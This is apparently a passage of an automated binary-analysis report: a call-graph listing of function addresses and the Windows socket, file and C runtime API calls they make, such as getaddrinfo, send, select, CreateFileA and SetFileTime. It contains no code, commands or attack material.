7ff7f1da5718 GetEnvironmentVariableA 34442->34443 34443->34442 34443->34446 34456 7ff7f1d93c00 34443->34456 34462 7ff7f1da50b0 15 API calls _scwprintf 34443->34462 34446->34417 34446->34418 34453 7ff7f1da0bd6 __swprintf_l 34447->34453 34448 7ff7f1da0bf8 fgets 34449 7ff7f1da0c46 34448->34449 34448->34453 34450 7ff7f1deaf80 __swprintf_l 8 API calls 34449->34450 34451 7ff7f1da0c69 34450->34451 34451->34431 34453->34448 34453->34449 34463 7ff7f1da3ae0 free realloc __swprintf_l 34453->34463 34454->34424 34455->34432 34458 7ff7f1d93c36 34456->34458 34457 7ff7f1da50b0 15 API calls _scwprintf 34457->34458 34458->34457 34459 7ff7f1da3938 _open 34458->34459 34460 7ff7f1d93cae _strdup _close 34458->34460 34461 7ff7f1d93c95 34458->34461 34459->34458 34460->34461 34461->34443 34462->34443 34463->34453 34638 7ff7f1da3090 16 API calls 34639 7ff7f1dc7090 22 API calls 34640 7ff7f1d95094 60 API calls 34641 7ff7f1d95888 8 API calls 34643 7ff7f1da008c 23 API calls 34645 7ff7f1d91060 33 API calls __swprintf_l 32251 7ff7f1dbea60 32272 7ff7f1da4fc8 32251->32272 32254 7ff7f1dbec1e WSAGetLastError 32255 7ff7f1dbec30 32254->32255 32256 7ff7f1dbec28 WSAGetLastError 32254->32256 32258 7ff7f1dbec38 EnterCriticalSection 32255->32258 32256->32255 32257 7ff7f1dbec04 WSASetLastError 32259 7ff7f1dbebf3 32257->32259 32260 7ff7f1dbec47 LeaveCriticalSection 32258->32260 32261 7ff7f1dbec6c 32258->32261 32259->32254 32259->32258 32275 7ff7f1dbe838 DeleteCriticalSection closesocket 32260->32275 32263 7ff7f1dbec76 send 32261->32263 32264 7ff7f1dbec9a LeaveCriticalSection 32261->32264 32263->32264 32266 7ff7f1dbec91 WSAGetLastError 32263->32266 32265 7ff7f1dbec58 32264->32265 32276 7ff7f1deaf80 32265->32276 32266->32264 32269 7ff7f1dbebef 32269->32257 32269->32259 32270 7ff7f1dbebe9 freeaddrinfo 32270->32269 32271 7ff7f1dbeade __swprintf_l 32271->32257 32271->32269 32271->32270 32285 7ff7f1da4f70 32272->32285 32277 7ff7f1deaf89 32276->32277 32278 7ff7f1deafe0 IsProcessorFeaturePresent 32277->32278 32279 7ff7f1dbecb9 32277->32279 32280 7ff7f1deaff8 32278->32280 32307 7ff7f1deb1d4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 32280->32307 32282 7ff7f1deb00b 32308 7ff7f1deafa0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 32282->32308 32288 7ff7f1da44a4 32285->32288 32289 7ff7f1da44c3 __swprintf_l 32288->32289 32297 7ff7f1da3df8 32289->32297 32291 7ff7f1da451a 32292 7ff7f1deaf80 __swprintf_l 8 API calls 32291->32292 32293 7ff7f1da4f31 getaddrinfo 32292->32293 32293->32254 32293->32271 32294 7ff7f1da4fc8 15 API calls __swprintf_l 32295 7ff7f1da4516 __swprintf_l 32294->32295 32295->32291 32295->32294 32306 7ff7f1da3d44 __stdio_common_vsprintf __swprintf_l 32295->32306 32305 7ff7f1da3e33 __swprintf_l 32297->32305 32298 7ff7f1da3e8f strncmp 32300 7ff7f1da4007 strncmp 32298->32300 32301 7ff7f1da3ead strncmp 32298->32301 32299 7ff7f1da43ac 32299->32295 32302 7ff7f1da4027 strncmp 32300->32302 32300->32305 32301->32300 32301->32305 32302->32305 32303 7ff7f1da4167 strtol 32303->32305 32304 7ff7f1da412c strtol 32304->32305 32305->32298 32305->32299 32305->32300 32305->32303 32305->32304 32306->32295 32307->32282 34646 7ff7f1daa860 QueryPerformanceCounter GetTickCount 34647 7ff7f1dcea60 159 API calls 34650 7ff7f1d92070 24 API calls 34653 7ff7f1dd4a70 402 API calls __swprintf_l 34654 7ff7f1dd0670 66 API calls __swprintf_l 34656 7ff7f1dec06c RtlUnwindEx _IsNonwritableInCurrentImage __C_specific_handler __except_validate_context_record 34658 7ff7f1ded646 12 API calls 34659 7ff7f1d9ba41 20 API calls 34662 7ff7f1dd5640 164 API calls __swprintf_l 34665 7ff7f1da7450 feof fclose 34667 7ff7f1d94250 __acrt_iob_func fseek 34668 7ff7f1d91c50 28 API calls __swprintf_l 34670 7ff7f1dd0250 24 API calls 34672 7ff7f1da6420 fclose 34675 7ff7f1dde020 22 API calls 32722 7ff7f1d9f825 32751 7ff7f1d936e8 32722->32751 32725 7ff7f1d9f83a 32781 7ff7f1d9a80c 19 API calls 32725->32781 32726 7ff7f1d9f84e calloc 32729 7ff7f1d9f869 32726->32729 32728 7ff7f1d9f734 32759 7ff7f1dadcc4 32729->32759 32731 7ff7f1d9f8d0 32732 7ff7f1dadcc4 82 API calls 32731->32732 32733 7ff7f1d9f8df 32732->32733 32734 7ff7f1dadcc4 82 API calls 32733->32734 32735 7ff7f1d9f8ee 32734->32735 32736 7ff7f1dadcc4 82 API calls 32735->32736 32737 7ff7f1d9f8fd 32736->32737 32738 7ff7f1dadcc4 82 API calls 32737->32738 32739 7ff7f1d9f90c 32738->32739 32741 7ff7f1d9f92d 32739->32741 32771 7ff7f1da0444 32739->32771 32782 7ff7f1dade70 124 API calls 32741->32782 32743 7ff7f1d9f94a 32743->32728 32744 7ff7f1d936e8 6 API calls 32743->32744 32745 7ff7f1d9f964 32744->32745 32746 7ff7f1d9f968 32745->32746 32747 7ff7f1d9f977 32745->32747 32749 7ff7f1d936e8 6 API calls 32746->32749 32783 7ff7f1d938f4 22 API calls 32747->32783 32749->32747 32752 7ff7f1d9370c 32751->32752 32753 7ff7f1d93732 32752->32753 32754 7ff7f1d93719 malloc 32752->32754 32755 7ff7f1d93737 32752->32755 32784 7ff7f1d93620 free free free free free 32753->32784 32757 7ff7f1d93754 32754->32757 32758 7ff7f1d9372a 32754->32758 32755->32725 32755->32726 32757->32755 32758->32753 32760 7ff7f1dadce8 32759->32760 32767 7ff7f1dadcfb 32759->32767 32761 7ff7f1dade35 32760->32761 32762 7ff7f1daddc3 32760->32762 32760->32767 32763 7ff7f1dade3e 32761->32763 32761->32767 32765 7ff7f1daddfb 32762->32765 32766 7ff7f1daddcb 32762->32766 32762->32767 32788 7ff7f1db5758 52 API calls 32763->32788 32765->32767 32769 7ff7f1dade04 calloc 32765->32769 32766->32767 32785 7ff7f1dbf300 32766->32785 32767->32731 32768 7ff7f1dade26 32768->32767 32769->32768 32780 7ff7f1da0478 32771->32780 32772 7ff7f1da050d 32773 7ff7f1da0532 32772->32773 32775 7ff7f1da0567 32772->32775 32790 7ff7f1da01e0 25 API calls __swprintf_l 32772->32790 32774 7ff7f1da053f _strdup 32773->32774 32773->32775 32774->32775 32778 7ff7f1da0554 32774->32778 32775->32739 32791 7ff7f1d9a80c 19 API calls 32778->32791 32780->32772 32780->32775 32789 7ff7f1da01e0 25 API calls __swprintf_l 32780->32789 32781->32728 32782->32743 32784->32755 32786 7ff7f1da51f8 37 API calls 32785->32786 32787 7ff7f1dbf314 32786->32787 32787->32767 32788->32768 32789->32772 32790->32773 32791->32775 34678 7ff7f1d9b3ae 92 API calls __swprintf_l 34680 7ff7f1d95a34 22 API calls 34681 7ff7f1d9cc2c 91 API calls 34683 7ff7f1ded628 _seh_filter_exe 34684 7ff7f1dec028 10 API calls __vcrt_uninitialize_locks 32792 7ff7f1d9a5fa 32796 7ff7f1d9a3f0 32792->32796 32795 7ff7f1d9a60e 32797 7ff7f1d9a49a free 32796->32797 32803 7ff7f1d9a417 32796->32803 32798 7ff7f1d9a4ae 32797->32798 32801 7ff7f1d9a4bd 32797->32801 32799 7ff7f1d9a4b7 fclose 32798->32799 32798->32801 32799->32801 32800 7ff7f1d9a4d6 free 32805 7ff7f1d9a511 fflush 32800->32805 32806 7ff7f1d9a4f1 32800->32806 32801->32800 32804 7ff7f1d9a4d0 fclose 32801->32804 32802 7ff7f1d9a43c 32807 7ff7f1d9a455 FreeLibrary 32802->32807 32808 7ff7f1d9a469 32802->32808 32803->32797 32803->32802 32816 7ff7f1ddf2c0 32803->32816 32804->32800 32805->32795 32819 7ff7f1d9256c 82 API calls 32806->32819 32807->32808 32809 7ff7f1d9a475 FreeLibrary 32808->32809 32810 7ff7f1d9a489 32808->32810 32809->32810 32812 7ff7f1d9a494 32810->32812 32813 7ff7f1d9a48e WSACleanup 32810->32813 32812->32797 32813->32812 32814 7ff7f1d9a500 free 32814->32805 32814->32806 32817 7ff7f1ddf2e6 32816->32817 32818 7ff7f1ddf2d0 FreeLibrary 32816->32818 32817->32802 32818->32817 32819->32814 34688 7ff7f1daebfd 22 API calls __swprintf_l 34689 7ff7f1d92010 _errno _errno 34691 7ff7f1dce610 162 API calls __swprintf_l 34694 7ff7f1dce1e0 176 API calls 34696 7ff7f1d9fff0 _errno strtod _errno 34697 7ff7f1d9b6c6 245 API calls 2 library calls 34702 7ff7f1d9ffc0 _errno strtol _errno 34522 7ff7f1d9f1ce 34523 7ff7f1d9f1d8 34522->34523 34524 7ff7f1d9f1f0 34522->34524 34525 7ff7f1d9f1e1 34523->34525 34532 7ff7f1d9f1f8 34523->34532 34567 7ff7f1d9a80c 19 API calls 34525->34567 34527 7ff7f1d9f2ca 34527->34524 34570 7ff7f1d9b1f4 7 API calls 34527->34570 34532->34527 34533 7ff7f1d9a9b4 191 API calls 34532->34533 34534 7ff7f1d9f26a Sleep 34532->34534 34536 7ff7f1d9a880 34532->34536 34550 7ff7f1da522c 34532->34550 34568 7ff7f1d937d4 7 API calls 34532->34568 34569 7ff7f1d9a840 free 34532->34569 34533->34532 34534->34532 34537 7ff7f1d9a8b6 34536->34537 34549 7ff7f1d9a949 34536->34549 34540 7ff7f1da3938 _open 34537->34540 34537->34549 34538 7ff7f1deaf80 __swprintf_l 8 API calls 34539 7ff7f1d9a963 34538->34539 34539->34532 34541 7ff7f1d9a8e0 34540->34541 34542 7ff7f1d9a976 34541->34542 34543 7ff7f1d9a8ec _fstat64 34541->34543 34572 7ff7f1d9a7ac 16 API calls __swprintf_l 34542->34572 34543->34542 34545 7ff7f1d9a8fd 34543->34545 34545->34549 34571 7ff7f1da1e80 87 API calls __swprintf_l 34545->34571 34546 7ff7f1d9a98d 34547 7ff7f1d9a995 _close __acrt_iob_func _fileno 34546->34547 34546->34549 34547->34549 34549->34538 34551 7ff7f1da524a 34550->34551 34556 7ff7f1da5242 34550->34556 34552 7ff7f1da5261 34551->34552 34553 7ff7f1da5277 34551->34553 34579 7ff7f1db1fa0 21 API calls __swprintf_l 34552->34579 34555 7ff7f1daa914 41 API calls 34553->34555 34557 7ff7f1da528e 34553->34557 34555->34557 34556->34532 34557->34556 34573 7ff7f1daac80 34557->34573 34559 7ff7f1da52d6 34560 7ff7f1da52dc 34559->34560 34565 7ff7f1da52fd 34559->34565 34561 7ff7f1dace64 124 API calls 34560->34561 34561->34556 34562 7ff7f1da5340 34580 7ff7f1dab2bc 70 API calls 34562->34580 34563 7ff7f1dab840 36 API calls 34563->34565 34565->34562 34565->34563 34566 7ff7f1dacd58 447 API calls 34565->34566 34566->34565 34567->34524 34568->34532 34569->34532 34570->34524 34571->34549 34572->34546 34574 7ff7f1daaca0 34573->34574 34578 7ff7f1daacca 34573->34578 34574->34578 34581 7ff7f1dad9d0 23 API calls __swprintf_l 34574->34581 34576 7ff7f1daad44 34582 7ff7f1dad900 10 API calls 34576->34582 34578->34559 34579->34556 34580->34556 34581->34576 34582->34578 34707 7ff7f1d9b9ce 125 API calls 34708 7ff7f1da63a0 fopen fseek 34710 7ff7f1d9b9a2 124 API calls 34712 7ff7f1dda7a0 178 API calls 34713 7ff7f1d9b6c9 106 API calls __swprintf_l 34715 7ff7f1de0db0 23 API calls 34716 7ff7f1dd19b0 161 API calls 34719 7ff7f1dce780 47 API calls __swprintf_l 32820 7ff7f1d9f579 32827 7ff7f1d9edec 32820->32827 32822 7ff7f1d9f62e 32824 7ff7f1d9f57e 32824->32822 32825 7ff7f1d9f5d1 free free free free 32824->32825 32850 7ff7f1d9a9b4 32824->32850 32946 7ff7f1d9a840 free 32824->32946 32825->32824 32825->32825 32947 7ff7f1da3014 32827->32947 32831 7ff7f1d9ee50 32835 7ff7f1d9ee58 32831->32835 32958 7ff7f1d9ec68 94 API calls 32831->32958 32833 7ff7f1dace64 124 API calls 32833->32835 32834 7ff7f1d9f0cc 32994 7ff7f1da0f28 18 API calls __swprintf_l 32834->32994 32835->32824 32838 7ff7f1d9f0e1 32838->32833 32841 7ff7f1da5370 16 API calls 32848 7ff7f1d9ee7b 32841->32848 32842 7ff7f1d9f11f _time64 32842->32848 32845 7ff7f1d9a9b4 191 API calls 32845->32848 32846 7ff7f1da4fc8 __swprintf_l 15 API calls 32846->32848 32847 7ff7f1d9f03b _time64 32847->32848 32848->32834 32848->32838 32848->32841 32848->32842 32848->32845 32848->32846 32848->32847 32959 7ff7f1dab840 32848->32959 32979 7ff7f1dacd58 32848->32979 32991 7ff7f1da0f28 18 API calls __swprintf_l 32848->32991 32992 7ff7f1dab2bc 70 API calls 32848->32992 32993 7ff7f1d9a840 free 32848->32993 32995 7ff7f1d9ec68 94 API calls 32848->32995 32851 7ff7f1d9a9fa 32850->32851 32922 7ff7f1d9b015 32850->32922 32852 7ff7f1d9aa11 _close 32851->32852 32853 7ff7f1d9aa1b 32851->32853 32851->32922 32852->32853 32854 7ff7f1d9ab38 32853->32854 32855 7ff7f1d9aa39 32853->32855 32857 7ff7f1da5370 16 API calls 32854->32857 32861 7ff7f1d9ab88 32854->32861 32862 7ff7f1da511c 15 API calls 32855->32862 32856 7ff7f1d9aa78 32863 7ff7f1d9aab6 32856->32863 32867 7ff7f1d9aa8d fflush 32856->32867 32859 7ff7f1d9ab55 32857->32859 32858 7ff7f1d9abb1 32858->32856 32873 7ff7f1da5370 16 API calls 32858->32873 32860 7ff7f1d9ab62 32859->32860 32859->32861 32860->32856 32869 7ff7f1da511c 15 API calls 32860->32869 32861->32856 32861->32858 32865 7ff7f1d9abaa _fileno 32861->32865 32866 7ff7f1d9aa62 32862->32866 32864 7ff7f1d9ae01 32863->32864 32871 7ff7f1d9aad7 32863->32871 32875 7ff7f1da3014 2 API calls 32863->32875 32870 7ff7f1d9ae22 32864->32870 32874 7ff7f1d9ae0e fputs 32864->32874 32865->32858 32866->32856 32872 7ff7f1d9aa67 fputs 32866->32872 32867->32863 32868 7ff7f1d9aa97 32867->32868 32868->32863 32881 7ff7f1da511c 15 API calls 32868->32881 32869->32856 32879 7ff7f1d9ae32 fclose 32870->32879 32897 7ff7f1d9ae81 32870->32897 32871->32864 32878 7ff7f1d9ac35 32871->32878 32882 7ff7f1d9ac0b 32871->32882 32898 7ff7f1d9ab2e 32871->32898 32872->32856 32876 7ff7f1d9abd9 32873->32876 32874->32870 32875->32871 32876->32856 34330 7ff7f1d920d0 32876->34330 32877 7ff7f1d9b107 32886 7ff7f1d9b11e 32877->32886 34370 7ff7f1da33f4 32 API calls 32877->34370 32885 7ff7f1d9ac9d 32878->32885 32889 7ff7f1d9ac47 32878->32889 32883 7ff7f1d9ae3c 32879->32883 32884 7ff7f1d9ae5d 32879->32884 32881->32863 32888 7ff7f1da5370 16 API calls 32882->32888 32883->32884 32883->32897 32903 7ff7f1da511c 15 API calls 32883->32903 32884->32897 34365 7ff7f1d9a74c 19 API calls 32884->34365 32887 7ff7f1da5370 16 API calls 32885->32887 32891 7ff7f1d9b139 32886->32891 32892 7ff7f1d9b133 fclose 32886->32892 32895 7ff7f1d9acb1 32887->32895 32888->32898 32899 7ff7f1da5370 16 API calls 32889->32899 32893 7ff7f1d9b142 free 32891->32893 32894 7ff7f1d9b157 32891->32894 32892->32891 32893->32894 32900 7ff7f1d9b172 32894->32900 32906 7ff7f1d9b16c fclose 32894->32906 32895->32898 32907 7ff7f1da5370 16 API calls 32895->32907 32897->32877 32902 7ff7f1da5370 16 API calls 32897->32902 32898->32864 32901 7ff7f1d9af14 32898->32901 32910 7ff7f1da5370 16 API calls 32898->32910 32904 7ff7f1d9ac5b 32899->32904 32908 7ff7f1d9b190 32900->32908 32909 7ff7f1d9b17b free 32900->32909 34367 7ff7f1d9a780 19 API calls 32901->34367 32911 7ff7f1d9aec0 32902->32911 32903->32884 32913 7ff7f1da5370 16 API calls 32904->32913 32905 7ff7f1d9ae79 _unlink 32905->32897 32906->32900 32907->32898 32915 7ff7f1d9b1a6 32908->32915 32917 7ff7f1db67dc 124 API calls 32908->32917 32909->32908 32925 7ff7f1d9ad45 32910->32925 32911->32877 32914 7ff7f1d9aecd _strdup 32911->32914 32913->32898 32920 7ff7f1d9b04c CreateFileA 32914->32920 32921 7ff7f1d9aeeb 32914->32921 32918 7ff7f1d9b1b6 free free free 32915->32918 32919 7ff7f1d9b1ad free 32915->32919 32916 7ff7f1d9af53 32916->32922 32934 7ff7f1d9afb1 fflush _fileno _get_osfhandle _lseeki64 32916->32934 32937 7ff7f1da511c 15 API calls 32916->32937 32917->32915 32918->32922 32919->32918 32923 7ff7f1d9b08a 32920->32923 32924 7ff7f1d9b07d free 32920->32924 34366 7ff7f1d9a780 19 API calls 32921->34366 32922->32824 32927 7ff7f1d9b090 SetFileTime 32923->32927 32928 7ff7f1d9b0ec GetLastError 32923->32928 32924->32923 32925->32901 32936 7ff7f1da3014 2 API calls 32925->32936 32930 7ff7f1d9b0e0 CloseHandle 32927->32930 32931 7ff7f1d9b0c5 GetLastError 32927->32931 34369 7ff7f1d9a780 19 API calls 32928->34369 32929 7ff7f1d9aefd 32929->32877 32933 7ff7f1d9af06 free 32929->32933 32930->32877 34368 7ff7f1d9a780 19 API calls 32931->34368 32933->32877 32938 7ff7f1d9afe6 SetEndOfFile 32934->32938 32944 7ff7f1d9b007 32934->32944 32939 7ff7f1d9ad87 32936->32939 32940 7ff7f1d9afad 32937->32940 32941 7ff7f1d9aff3 fseek 32938->32941 32938->32944 32939->32901 32942 7ff7f1d9adee 32939->32942 32940->32934 32941->32922 32941->32944 34364 7ff7f1d9a780 19 API calls 32942->34364 32944->32922 32945 7ff7f1da511c 15 API calls 32944->32945 32945->32922 32946->32824 32948 7ff7f1da3050 GetTickCount 32947->32948 32949 7ff7f1da3021 QueryPerformanceCounter 32947->32949 32950 7ff7f1d9ee26 _time64 32948->32950 32949->32950 32951 7ff7f1daa914 calloc 32950->32951 32952 7ff7f1daa948 32951->32952 32953 7ff7f1dbf300 37 API calls 32952->32953 32957 7ff7f1daaa32 32952->32957 32954 7ff7f1daa9d7 32953->32954 32954->32957 32996 7ff7f1dc5814 32954->32996 32957->32831 32958->32848 32967 7ff7f1dab891 32959->32967 32968 7ff7f1dab8a6 32959->32968 32960 7ff7f1deaf80 __swprintf_l 8 API calls 32961 7ff7f1dabb73 32960->32961 32961->32848 32962 7ff7f1dab914 33000 7ff7f1dad830 32962->33000 32964 7ff7f1dab5d8 23 API calls 32964->32967 32965 7ff7f1daba7f WSAWaitForMultipleEvents 32966 7ff7f1dabb36 WSAResetEvent 32965->32966 32972 7ff7f1dabaa4 32965->32972 32966->32968 32967->32962 32967->32964 32967->32968 32968->32960 32970 7ff7f1dab921 32970->32965 32970->32968 32973 7ff7f1dab9e2 send 32970->32973 32974 7ff7f1daba1e WSAEventSelect 32970->32974 32976 7ff7f1daba65 32970->32976 33006 7ff7f1dab5d8 32970->33006 32971 7ff7f1dab5d8 23 API calls 32971->32972 32972->32966 32972->32971 32975 7ff7f1dabafa WSAEnumNetworkEvents WSAEventSelect 32972->32975 32973->32974 32974->32968 32974->32970 32975->32972 32977 7ff7f1daba76 32976->32977 33010 7ff7f1dc62a8 32976->33010 32977->32965 32977->32972 32980 7ff7f1dcbdf4 __swprintf_l 2 API calls 32979->32980 32984 7ff7f1dacd86 32980->32984 32981 7ff7f1dacdad 32982 7ff7f1deaf80 __swprintf_l 8 API calls 32981->32982 32983 7ff7f1dace53 32982->32983 32983->32848 32984->32981 32988 7ff7f1dacdd9 32984->32988 33033 7ff7f1dabde0 32984->33033 32987 7ff7f1dace29 32987->32981 33070 7ff7f1dad900 10 API calls 32987->33070 32988->32987 33068 7ff7f1dc379c 8 API calls 32988->33068 33069 7ff7f1dad600 8 API calls 32988->33069 32991->32848 32992->32848 32993->32848 32994->32838 32995->32848 32997 7ff7f1daaa1a WSACreateEvent 32996->32997 32998 7ff7f1dc5830 socket 32996->32998 32997->32957 32998->32997 32999 7ff7f1dc5846 closesocket 32998->32999 32999->32997 33001 7ff7f1dad856 33000->33001 33005 7ff7f1dad84e 33000->33005 33002 7ff7f1dcbdf4 __swprintf_l 2 API calls 33001->33002 33001->33005 33003 7ff7f1dad86e 33002->33003 33029 7ff7f1dc35c8 8 API calls __swprintf_l 33003->33029 33005->32970 33007 7ff7f1dab5f1 33006->33007 33009 7ff7f1dab60f 33006->33009 33007->33009 33030 7ff7f1dbf1ac 23 API calls __swprintf_l 33007->33030 33009->32970 33011 7ff7f1dc6302 33010->33011 33012 7ff7f1dc62e8 33010->33012 33031 7ff7f1dc60f8 WSASetLastError Sleep 33011->33031 33012->33011 33023 7ff7f1dc6334 33012->33023 33014 7ff7f1dc630a 33015 7ff7f1deaf80 __swprintf_l 8 API calls 33014->33015 33016 7ff7f1dc6319 33015->33016 33016->32977 33017 7ff7f1dc6478 33019 7ff7f1dc6487 33017->33019 33022 7ff7f1dc64a7 select 33017->33022 33018 7ff7f1dc6494 WSASetLastError 33018->33014 33032 7ff7f1dc60f8 WSASetLastError Sleep 33019->33032 33024 7ff7f1dc653e 33022->33024 33023->33017 33023->33018 33024->33014 33026 7ff7f1dc6576 __WSAFDIsSet 33024->33026 33027 7ff7f1dc65a4 __WSAFDIsSet 33024->33027 33028 7ff7f1dc65c6 __WSAFDIsSet 33024->33028 33025 7ff7f1dc648f 33025->33024 33026->33024 33026->33027 33027->33024 33027->33028 33028->33024 33029->33005 33030->33009 33031->33014 33032->33025 33034 7ff7f1dabe25 33033->33034 33039 7ff7f1dac5d9 33033->33039 33035 7ff7f1daae78 69 API calls 33034->33035 33034->33039 33063 7ff7f1dabe50 33034->33063 33035->33063 33036 7ff7f1dadc64 23 API calls 33036->33063 33038 7ff7f1dc6ef8 24 API calls 33038->33063 33039->32984 33041 7ff7f1dc6668 2 API calls 33062 7ff7f1dac147 33041->33062 33044 7ff7f1dabb90 69 API calls 33044->33063 33045 7ff7f1dc3188 22 API calls 33045->33063 33052 7ff7f1daae78 69 API calls 33052->33063 33055 7ff7f1dad9d0 23 API calls 33055->33063 33058 7ff7f1dc2c88 52 API calls 33058->33062 33059 7ff7f1db1f00 21 API calls 33059->33063 33061 7ff7f1dab4a0 21 API calls 33061->33063 33062->33041 33062->33058 33062->33063 33065 7ff7f1daae78 69 API calls 33062->33065 33241 7ff7f1de2610 126 API calls __swprintf_l 33062->33241 33243 7ff7f1dc2910 65 API calls _scwprintf 33062->33243 33063->33036 33063->33038 33063->33039 33063->33044 33063->33045 33063->33052 33063->33055 33063->33059 33063->33061 33063->33062 33064 7ff7f1db73b8 60 API calls 33063->33064 33071 7ff7f1dc8690 33063->33071 33074 7ff7f1dabcc0 33063->33074 33080 7ff7f1db3614 33063->33080 33117 7ff7f1dc5334 33063->33117 33121 7ff7f1dad068 33063->33121 33130 7ff7f1dbb714 33063->33130 33148 7ff7f1dc6668 33063->33148 33151 7ff7f1dbb82c 33063->33151 33162 7ff7f1dca370 33063->33162 33198 7ff7f1dc2614 33063->33198 33233 7ff7f1dc8510 33063->33233 33242 7ff7f1dbf084 36 API calls __swprintf_l 33063->33242 33244 7ff7f1db1fa0 21 API calls __swprintf_l 33063->33244 33245 7ff7f1dcbf1c 23 API calls 33063->33245 33246 7ff7f1dc0614 21 API calls __swprintf_l 33063->33246 33064->33063 33065->33062 33068->32988 33069->32988 33070->32981 33247 7ff7f1dbce6c 33071->33247 33075 7ff7f1dabce8 33074->33075 33078 7ff7f1dabcf1 33075->33078 33523 7ff7f1dc03c8 33075->33523 33078->33063 33079 7ff7f1dc8510 207 API calls 33079->33078 33081 7ff7f1db3673 33080->33081 33100 7ff7f1db3668 33080->33100 33082 7ff7f1dcbdf4 __swprintf_l 2 API calls 33081->33082 33083 7ff7f1db367d 33082->33083 33084 7ff7f1db368e 33083->33084 33092 7ff7f1db36c5 33083->33092 33086 7ff7f1db3484 194 API calls 33084->33086 33085 7ff7f1deaf80 __swprintf_l 8 API calls 33087 7ff7f1db3ad4 33085->33087 33088 7ff7f1db369c 33086->33088 33087->33063 33094 7ff7f1db35a4 46 API calls 33088->33094 33088->33100 33089 7ff7f1dc6138 15 API calls 33089->33092 33090 7ff7f1db38e6 33091 7ff7f1db29ec 10 API calls 33090->33091 33093 7ff7f1db38f6 33091->33093 33092->33089 33092->33090 33096 7ff7f1db2f1c SleepEx getsockopt WSAGetLastError 33092->33096 33099 7ff7f1db3944 33092->33099 33102 7ff7f1db3802 WSASetLastError 33092->33102 33112 7ff7f1db1f00 21 API calls 33092->33112 33114 7ff7f1db29ec 10 API calls 33092->33114 33116 7ff7f1db2fdc 220 API calls 33092->33116 33548 7ff7f1dc5110 _errno 33092->33548 33549 7ff7f1dae9c8 27 API calls __swprintf_l 33092->33549 33095 7ff7f1db3902 33093->33095 33098 7ff7f1db39d7 33093->33098 33094->33100 33550 7ff7f1db1fa0 21 API calls __swprintf_l 33095->33550 33096->33092 33098->33100 33551 7ff7f1db2fdc 220 API calls 33098->33551 33103 7ff7f1db4190 closesocket 33099->33103 33105 7ff7f1db3999 33099->33105 33100->33085 33102->33092 33103->33105 33530 7ff7f1db3484 33105->33530 33111 7ff7f1db3a0f 33111->33100 33552 7ff7f1dae9c8 27 API calls __swprintf_l 33111->33552 33112->33092 33113 7ff7f1db3a78 33553 7ff7f1db1fa0 21 API calls __swprintf_l 33113->33553 33114->33092 33116->33092 33118 7ff7f1dc5356 33117->33118 33597 7ff7f1dc51f8 33118->33597 33120 7ff7f1dc536e 33120->33063 33122 7ff7f1dab5d8 23 API calls 33121->33122 33124 7ff7f1dad0bd 33122->33124 33123 7ff7f1dad1ed calloc 33127 7ff7f1dad202 33123->33127 33124->33123 33128 7ff7f1dad323 __swprintf_l 33124->33128 33125 7ff7f1deaf80 __swprintf_l 8 API calls 33126 7ff7f1dad4fc 33125->33126 33126->33063 33127->33124 33127->33128 33129 7ff7f1dad32d 33127->33129 33128->33125 33129->33128 33131 7ff7f1dc6668 2 API calls 33130->33131 33132 7ff7f1dbb740 33131->33132 33133 7ff7f1dcbdf4 __swprintf_l 2 API calls 33132->33133 33135 7ff7f1dbb750 33132->33135 33134 7ff7f1dbb76c 33133->33134 33136 7ff7f1dbb781 33134->33136 33137 7ff7f1dbb79d 33134->33137 33135->33063 33612 7ff7f1db3f1c 33136->33612 33138 7ff7f1dc6668 2 API calls 33137->33138 33140 7ff7f1dbb7b0 33138->33140 33142 7ff7f1dbb7dc 33140->33142 33143 7ff7f1dc6668 2 API calls 33140->33143 33141 7ff7f1dbb797 33141->33135 33144 7ff7f1dcbdf4 __swprintf_l 2 API calls 33141->33144 33145 7ff7f1db33d8 44 API calls 33142->33145 33143->33142 33144->33135 33146 7ff7f1dbb7f8 33145->33146 33622 7ff7f1db82f0 21 API calls 33146->33622 33149 7ff7f1dcbdf4 __swprintf_l 2 API calls 33148->33149 33150 7ff7f1dc668a 33149->33150 33150->33063 33152 7ff7f1db8f64 124 API calls 33151->33152 33153 7ff7f1dbb852 33152->33153 33707 7ff7f1dbadc8 33153->33707 33155 7ff7f1dbb89d 33155->33063 33157 7ff7f1dbb714 228 API calls 33158 7ff7f1dbb8b3 33157->33158 33158->33155 33159 7ff7f1dab4a0 21 API calls 33158->33159 33160 7ff7f1dbb8d2 33159->33160 33161 7ff7f1db73b8 60 API calls 33160->33161 33161->33155 33163 7ff7f1dca3ab 33162->33163 33197 7ff7f1dca3c1 __swprintf_l 33163->33197 34065 7ff7f1dc8e9c 33163->34065 33165 7ff7f1dca3dc 33167 7ff7f1dca450 33165->33167 33165->33197 34194 7ff7f1da50b0 15 API calls _scwprintf 33165->34194 33167->33197 34077 7ff7f1dc7b1c 33167->34077 33169 7ff7f1dca485 33170 7ff7f1dca4f5 33169->33170 33169->33197 34195 7ff7f1da50b0 15 API calls _scwprintf 33169->34195 33174 7ff7f1dca552 33170->33174 33170->33197 34196 7ff7f1da50b0 15 API calls _scwprintf 33170->34196 33174->33197 34083 7ff7f1dc9384 33174->34083 33175 7ff7f1dca595 33175->33197 34091 7ff7f1dca0c4 33175->34091 33181 7ff7f1dca667 33181->33197 34114 7ff7f1dc90fc 33181->34114 33183 7ff7f1dca680 33184 7ff7f1db1c50 15 API calls 33183->33184 33183->33197 33185 7ff7f1dca808 33184->33185 33185->33197 34136 7ff7f1dc9d88 33185->34136 33187 7ff7f1dca8aa 33187->33197 34147 7ff7f1dc8c7c 33187->34147 33191 7ff7f1dca8d0 33191->33197 34162 7ff7f1dc9618 33191->34162 33194 7ff7f1dc6ef8 24 API calls 33195 7ff7f1dca94e 33194->33195 33196 7ff7f1db1f00 21 API calls 33195->33196 33195->33197 33196->33197 33197->33063 33199 7ff7f1dc2661 33198->33199 33200 7ff7f1dc26a2 33199->33200 33203 7ff7f1dc6138 15 API calls 33199->33203 33201 7ff7f1dc26c0 33200->33201 33202 7ff7f1dc26a9 33200->33202 33208 7ff7f1dc26e5 33201->33208 34251 7ff7f1dc1b00 33201->34251 34275 7ff7f1db1fa0 21 API calls __swprintf_l 33202->34275 33203->33200 33207 7ff7f1dcbdf4 __swprintf_l 2 API calls 33216 7ff7f1dc2720 33207->33216 33209 7ff7f1dc270f 33208->33209 33230 7ff7f1dc26b8 33208->33230 34276 7ff7f1dc2200 49 API calls __swprintf_l 33208->34276 33209->33207 33209->33230 33210 7ff7f1dc27a9 33211 